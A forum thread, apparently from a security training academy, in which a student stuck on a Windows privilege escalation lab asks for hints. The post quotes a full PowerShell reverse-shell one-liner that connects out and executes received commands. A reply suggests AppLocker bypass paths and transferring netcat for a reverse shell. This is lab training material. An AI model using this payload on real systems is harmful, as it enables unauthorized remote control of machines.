[ACADEMY] Windows Privilege Escalation Skills Assessment - Part I reverse shell help

I can’t to save my life get a reverse shell… I know I can use powershell commands, but tried several different powershell reverse shell one liners like : Powershell ; powershell -nop -c “$client = New-Object System.Net.Sockets.TCPClient(‘1’,4444);$s = $client.GetStream();[byte]$b = 0…65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ’ + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()”. However none of them work.
I also tried uploading tools, but every directory doesn’t have write access, at least the ones I tried. Can someone give me a hint? I’m out of ideas.

try the paths of this repository on GitHub and then transfer a tool like “nc”(netcat) to receive a reverse shell. You can find the repository at the following link: UltimateAppLockerByPassList/Generic-AppLockerbypasses.md at master · api0cradle/UltimateAppLockerByPassList · GitHub"